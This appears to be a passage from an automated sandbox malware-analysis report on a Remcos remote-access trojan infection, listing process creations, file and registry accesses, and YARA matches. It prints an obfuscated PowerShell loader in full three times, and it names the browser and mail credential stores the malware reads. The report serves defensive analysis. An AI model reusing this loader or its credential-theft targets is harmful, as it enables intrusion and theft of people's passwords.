Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic';if (${host}.currentculture) {$sinologi++;}function gunflints($handsawfish){$guvnor=$handsawfish.length-$sinologi;$beflounce96='substri';$beflounce96+='ng';for( $fletteprocessers=7;$fletteprocessers -lt $guvnor;$fletteprocessers+=8){$racings+=$handsawfish.$beflounce96.invoke( $fletteprocessers, $sinologi);}$racings;}function skildrerne($larrigan){ &($cumulates) ($larrigan);}$cryptoglaux=gunflints 'slvpapim rullego aulostzc,quinaic acatel teitmilforzanda voldsh/unwilt 5ost.nsi.prmiere0glazier gennems( emascuw sluppeipylorosnpolyli d s,ifteoanalysewconvolvs intens damerkknfngsel.tbedaa e ptisanr1 tarrag0 typif,.dinguse0.ambesg;laurent aimilepwsudansaibestillnadrenin6.eander4latesce;agerdyr a toplaxdiso de6audi,iv4 precon; beregn tvrrebsrtromlervl ftreg: zilasm1csarre.2 opsaml1rringer.riv nca0franker)tilfres systempgudskregebawbeescaddendek igua,oosemenan/ econo.2libe ta0 shaved1harvard0bitmnst0standar1 trerum0presump1subinte by,selvf s,igeriunrooflrm.nostie disoccf bservaofug,ighxtriglyp/halvoff1kultu,m2aut,mob1klinikk.haa dva0triadic ';$spliff=gunflints 'bela neup,oletasktast.serejekllrudskyde-genopleadyffeleg oversteafskninnearfulstombreaf ';$parolees=gunflints 'udpegelhblgeb vt beregnt syphonpurfjeld:nicadss/alufo,i/svingsa1glycero0 str.tc3dep,tat.vavasor2d.alate3te,rsta7annegit.torkild8doekspr6svovlha.fro.tlu2strutma4tegneku7emb,yol/applikaucorticid rejsegmgemotsma di,selg orskefrin.ighteresurget ove,tr.isbaadshhashpibholie orkl kishn ';$furibund=gunflints 'enkelth>se.opus ';$cumulates=gunflints ' snitfliforladeemarlinexoverp i ';$vandrerkorts='paatalernes';$onklerne = gunflints 'undu eoefeelingc skyldnh,dlydskowastefu deflor%u.profiaover,oppovertrdp d onnidrigstrna graasttbnketsia rkanst%garant.\frescoefparaff eungeniaj ove bad cardioeingen.odha,lsstegule.dd.prstegaeplafo,dlshowboalallinge meazlef&bundtet&phi,ant ynglerne manslacliglotth.heologoraynard krampetp.ragra ';skildrerne (gunflints ' fredni$,ccumbmg akropolmich.elo skaanebspisekraudsivnildi,xinr: hyssenkfiskeriup.einstnunburntd dis ere.ntermatstamin.jfo tbrieaa.sindnlooeysuemonterisover,eatrykindeecetoniin bri.ebsc,shmer=underbe(electroc runcatmvi.terhdselvkla rangkla/inco.vecxylosma thainto$korrig osphac ln cum.lak.esparilunderchedvlerehrkontraknpa,ralle.dmeasu)sna
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic';if (${host}.currentculture) {$sinologi++;}function gunflints($handsawfish){$guvnor=$handsawfish.length-$sinologi;$beflounce96='substri';$beflounce96+='ng';for( $fletteprocessers=7;$fletteprocessers -lt $guvnor;$fletteprocessers+=8){$racings+=$handsawfish.$beflounce96.invoke( $fletteprocessers, $sinologi);}$racings;}function skildrerne($larrigan){ &($cumulates) ($larrigan);}$cryptoglaux=gunflints 'slvpapim rullego aulostzc,quinaic acatel teitmilforzanda voldsh/unwilt 5ost.nsi.prmiere0glazier gennems( emascuw sluppeipylorosnpolyli d s,ifteoanalysewconvolvs intens damerkknfngsel.tbedaa e ptisanr1 tarrag0 typif,.dinguse0.ambesg;laurent aimilepwsudansaibestillnadrenin6.eander4latesce;agerdyr a toplaxdiso de6audi,iv4 precon; beregn tvrrebsrtromlervl ftreg: zilasm1csarre.2 opsaml1rringer.riv nca0franker)tilfres systempgudskregebawbeescaddendek igua,oosemenan/ econo.2libe ta0 shaved1harvard0bitmnst0standar1 trerum0presump1subinte by,selvf s,igeriunrooflrm.nostie disoccf bservaofug,ighxtriglyp/halvoff1kultu,m2aut,mob1klinikk.haa dva0triadic ';$spliff=gunflints 'bela neup,oletasktast.serejekllrudskyde-genopleadyffeleg oversteafskninnearfulstombreaf ';$parolees=gunflints 'udpegelhblgeb vt beregnt syphonpurfjeld:nicadss/alufo,i/svingsa1glycero0 str.tc3dep,tat.vavasor2d.alate3te,rsta7annegit.torkild8doekspr6svovlha.fro.tlu2strutma4tegneku7emb,yol/applikaucorticid rejsegmgemotsma di,selg orskefrin.ighteresurget ove,tr.isbaadshhashpibholie orkl kishn ';$furibund=gunflints 'enkelth>se.opus ';$cumulates=gunflints ' snitfliforladeemarlinexoverp i ';$vandrerkorts='paatalernes';$onklerne = gunflints 'undu eoefeelingc skyldnh,dlydskowastefu deflor%u.profiaover,oppovertrdp d onnidrigstrna graasttbnketsia rkanst%garant.\frescoefparaff eungeniaj ove bad cardioeingen.odha,lsstegule.dd.prstegaeplafo,dlshowboalallinge meazlef&bundtet&phi,ant ynglerne manslacliglotth.heologoraynard krampetp.ragra ';skildrerne (gunflints ' fredni$,ccumbmg akropolmich.elo skaanebspisekraudsivnildi,xinr: hyssenkfiskeriup.einstnunburntd dis ere.ntermatstamin.jfo tbrieaa.sindnlooeysuemonterisover,eatrykindeecetoniin bri.ebsc,shmer=underbe(electroc runcatmvi.terhdselvkla rangkla/inco.vecxylosma thainto$korrig osphac ln cum.lak.esparilunderchedvlerehrkontraknpa,ralle.dmeasu)sna Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic';if (${host}.currentculture) {$sinologi++;}function gunflints($handsawfish){$guvnor=$handsawfish.length-$sinologi;$beflounce96='substri';$beflounce96+='ng';for( $fletteprocessers=7;$fletteprocessers -lt $guvnor;$fletteprocessers+=8){$racings+=$handsawfish.$beflounce96.invoke( $fletteprocessers, $sinologi);}$racings;}function skildrerne($larrigan){ &($cumulates) ($larrigan);}$cryptoglaux=gunflints 'slvpapim rullego aulostzc,quinaic acatel teitmilforzanda voldsh/unwilt 5ost.nsi.prmiere0glazier gennems( emascuw sluppeipylorosnpolyli d s,ifteoanalysewconvolvs intens damerkknfngsel.tbedaa e ptisanr1 tarrag0 typif,.dinguse0.ambesg;laurent aimilepwsudansaibestillnadrenin6.eander4latesce;agerdyr a toplaxdiso de6audi,iv4 precon; beregn tvrrebsrtromlervl ftreg: zilasm1csarre.2 opsaml1rringer.riv nca0franker)tilfres systempgudskregebawbeescaddendek igua,oosemenan/ econo.2libe ta0 shaved1harvard0bitmnst0standar1 trerum0presump1subinte by,selvf s,igeriunrooflrm.nostie disoccf bservaofug,ighxtriglyp/halvoff1kultu,m2aut,mob1klinikk.haa dva0triadic ';$spliff=gunflints 'bela neup,oletasktast.serejekllrudskyde-genopleadyffeleg oversteafskninnearfulstombreaf ';$parolees=gunflints 'udpegelhblgeb vt beregnt syphonpurfjeld:nicadss/alufo,i/svingsa1glycero0 str.tc3dep,tat.vavasor2d.alate3te,rsta7annegit.torkild8doekspr6svovlha.fro.tlu2strutma4tegneku7emb,yol/applikaucorticid rejsegmgemotsma di,selg orskefrin.ighteresurget ove,tr.isbaadshhashpibholie orkl kishn ';$furibund=gunflints 'enkelth>se.opus ';$cumulates=gunflints ' snitfliforladeemarlinexoverp i ';$vandrerkorts='paatalernes';$onklerne = gunflints 'undu eoefeelingc skyldnh,dlydskowastefu deflor%u.profiaover,oppovertrdp d onnidrigstrna graasttbnketsia rkanst%garant.\frescoefparaff eungeniaj ove bad cardioeingen.odha,lsstegule.dd.prstegaeplafo,dlshowboalallinge meazlef&bundtet&phi,ant ynglerne manslacliglotth.heologoraynard krampetp.ragra ';skildrerne (gunflints ' fredni$,ccumbmg akropolmich.elo skaanebspisekraudsivnildi,xinr: hyssenkfiskeriup.einstnunburntd dis ere.ntermatstamin.jfo tbrieaa.sindnlooeysuemonterisover,eatrykindeecetoniin bri.ebsc,shmer=underbe(electroc runcatmvi.terhdselvkla rangkla/inco.vecxylosma thainto$korrig osphac ln cum.lak.esparilunderchedvlerehrkontraknpa,ralle.dmeasu)sna Jump to behavior
Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerHK\
Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager&5H
Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerHK\O5
Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerHK\79a5
Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerHK\23
Source: wab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.dr Binary or memory string: [Program Manager]
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_22792933 cpuid 9_2_22792933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_22792264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 9_2_22792264
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 11_2_004082CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0041739B GetVersionExW, 10_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 11_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 11_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 11_2_00402DB3
Source: Yara match File source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wab.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wab.exe PID: 8036, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-LO8JHK Jump to behavior
Source: Yara match File source: 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs